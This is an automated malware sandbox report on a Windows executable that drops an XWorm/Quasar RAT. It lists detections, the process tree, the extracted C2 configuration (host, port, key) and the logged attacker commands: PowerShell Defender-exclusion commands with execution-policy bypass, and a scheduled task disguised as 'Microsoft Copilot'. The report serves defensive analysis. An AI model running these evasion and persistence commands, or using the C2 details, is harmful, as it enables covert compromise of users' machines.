Windows Analysis Report
PixpFUv4G7.exe

Overview

General Information

Sample name: PixpFUv4G7.exe
renamed because original name is a hash value
Original sample name: 066cffd2ba05642d4bcadf466fa00ba50210b6aed526c07382924c7aaece384e.exe
Analysis ID: 1527486
MD5: 75c7da1457f052ae8aa48571898d4094
SHA1: b851a0ba41ced091fd775b72c91b329d387cdeff
SHA256: 066cffd2ba05642d4bcadf466fa00ba50210b6aed526c07382924c7aaece384e
Tags: exe user-Chainskilabs

Detection

Quasar, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Quasar RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PixpFUv4G7.exe (PID: 344 cmdline: "C:\Users\user\Desktop\PixpFUv4G7.exe" MD5: 75C7DA1457F052AE8AA48571898D4094)
    • Copilot.exe (PID: 6488 cmdline: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" MD5: 34D9F35EA8D1A8C5A793D94B9FD998CB)
      • powershell.exe (PID: 7488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Copilot.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8028 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Copilot.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7712 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • unarchiver.exe (PID: 4460 cmdline: "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)
      • 7za.exe (PID: 6592 cmdline: "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Microsoft Copilot.exe (PID: 3088 cmdline: "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe" MD5: 34D9F35EA8D1A8C5A793D94B9FD998CB)
  • Microsoft Copilot.exe (PID: 2044 cmdline: "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe" MD5: 34D9F35EA8D1A8C5A793D94B9FD998CB)
  • Microsoft Copilot.exe (PID: 5784 cmdline: "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe" MD5: 34D9F35EA8D1A8C5A793D94B9FD998CB)
  • Microsoft Copilot.exe (PID: 4008 cmdline: "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe" MD5: 34D9F35EA8D1A8C5A793D94B9FD998CB)
  • cleanup
{"C2 url": ["content-portion.gl.at.ply.gg"], "Port": "47900", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll | MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth
  • 0xce93:$x1: Quasar.Common.Messages
  • 0xdc21:$x1: Quasar.Common.Messages
C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Profiles\Default.xml | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security
C:\Users\user\AppData\Local\Temp\Copilot.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\Copilot.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
Source | Rule | Description | Author | Strings
00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xea0f:$s6: VirtualBox
  • 0xe96d:$s8: Win32_ComputerSystem
  • 0xfe24:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xfec1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xffd6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xf73c:$cnc4: POST / HTTP/1.1
00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xe7c7:$s6: VirtualBox
  • 0xe725:$s8: Win32_ComputerSystem
  • 0xfbdc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xfc79:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xfd8e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xf4f4:$cnc4: POST / HTTP/1.1
Source | Rule | Description | Author | Strings
1.0.Copilot.exe.960000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
1.0.Copilot.exe.960000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
1.0.Copilot.exe.960000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xe9c7:$s6: VirtualBox
  • 0xe925:$s8: Win32_ComputerSystem
  • 0xfddc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xfe79:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xff8e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xf6f4:$cnc4: POST / HTTP/1.1

System Summary

Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Copilot.exe, ProcessId: 6488, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Copilot
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentProcessId: 6488, ParentProcessName: Copilot.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', ProcessId: 7488, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentProcessId: 6488, ParentProcessName: Copilot.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', ProcessId: 7488, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentProcessId: 6488, ParentProcessName: Copilot.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', ProcessId: 7488, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentProcessId: 6488, ParentProcessName: Copilot.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', ProcessId: 7488, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Copilot.exe, ProcessId: 6488, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Copilot
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentProcessId: 6488, ParentProcessName: Copilot.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', ProcessId: 7488, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Copilot.exe, ProcessId: 6488, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Copilot.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentProcessId: 6488, ParentProcessName: Copilot.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe", ProcessId: 7712, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentProcessId: 6488, ParentProcessName: Copilot.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe", ProcessId: 7712, ProcessName: schtasks.exe
Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Copilot.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Copilot.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentCommandLine: "C:\Users\user\Desktop\PixpFUv4G7.exe", ParentImage: C:\Users\user\Desktop\PixpFUv4G7.exe, ParentProcessId: 344, ParentProcessName: PixpFUv4G7.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ProcessId: 6488, ProcessName: Copilot.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Copilot.exe, ParentProcessId: 6488, ParentProcessName: Copilot.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe', ProcessId: 7488, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-07T00:54:49.015016+0200 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49973 | 147.185.221.21 | 47900 | TCP

AV Detection

Source: PixpFUv4G7.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: 00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["content-portion.gl.at.ply.gg"], "Port": "47900", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe | ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll | ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin | ReversingLabs: Detection: 72%
Source: PixpFUv4G7.exe | ReversingLabs: Detection: 71%
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Profiles\Default.xml, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.1% probability
Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Joe Sandbox ML: detected
Source: PixpFUv4G7.exe | Joe Sandbox ML: detected
Source: 1.0.Copilot.exe.960000.0.unpack | String decryptor: content-portion.gl.at.ply.gg
Source: 1.0.Copilot.exe.960000.0.unpack | String decryptor: 47900
Source: 1.0.Copilot.exe.960000.0.unpack | String decryptor: <123456789>
Source: 1.0.Copilot.exe.960000.0.unpack | String decryptor: <Xwormmm>
Source: 1.0.Copilot.exe.960000.0.unpack | String decryptor: Ratted
Source: 1.0.Copilot.exe.960000.0.unpack | String decryptor: USB.exe
Source: 1.0.Copilot.exe.960000.0.unpack | String decryptor: %Temp%
Source: 1.0.Copilot.exe.960000.0.unpack | String decryptor: Microsoft Copilot.exe
Source: PixpFUv4G7.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Windows\SysWOW64\unarchiver.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
                    Source: Binary string: 10/06/2024 6:53 PM: File is empty: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: -QlONC:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: -Ql^]File is empty: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: -Qlts10/06/2024 6:53 PM: File is empty: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\src\TestFramework\Extension.Desktop\obj\Release\Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.pdb source: Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.dll.4.dr
                    Source: Binary string: D:\a\_work\1\s\src\Adapter\MSTest.CoreAdapter\obj\Release\Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.pdb source: Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.dll.4.dr
                    Source: Binary string: C:\projects\globalmousekeyhook\MouseKeyHook\obj\Debug\Gma.System.MouseKeyHook.pdb source: Gma.System.MouseKeyHook.dll.4.dr
                    Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1282275364.0000000000B1D000.00000004.00000020.00020000.00000000.sdmp, 7za.exe, 00000004.00000002.1276652478.0000000000698000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: assembly_.dll.pdbR source: Microsoft.VisualStudio.CodeCoverage.Shim.dll.4.dr
                    Source: Binary string: MONOCE~3.DLLMono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1282275364.0000000000B45000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\projects\resourcelib\Source\ResourceLib\obj\Release\net45\Vestris.ResourceLib.pdbSHA256 source: 7za.exe, 00000004.00000003.1276298878.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: BouncyCastle.Crypto.pdbSHA256 source: BouncyCastle.Crypto.dll.4.dr
                    Source: Binary string: /_/artifacts/obj/Microsoft.VisualStudio.Coverage.Shim/Release/net35/Microsoft.VisualStudio.CodeCoverage.Shim.pdb source: Microsoft.VisualStudio.CodeCoverage.Shim.dll.4.dr
                    Source: Binary string: /_/artifacts/obj/Microsoft.VisualStudio.Coverage.Shim/Release/net35/Microsoft.VisualStudio.CodeCoverage.Shim.pdbe+ source: Microsoft.VisualStudio.CodeCoverage.Shim.dll.4.dr
                    Source: Binary string: Mech RAT/Mono.Cecil.Pdb.dll source: 7za.exe, 00000004.00000002.1276813409.0000000002265000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\src\TestFramework\MSTest.Core\obj\Release\Microsoft.VisualStudio.TestPlatform.TestFramework.pdb source: Microsoft.VisualStudio.TestPlatform.TestFramework.dll.4.dr
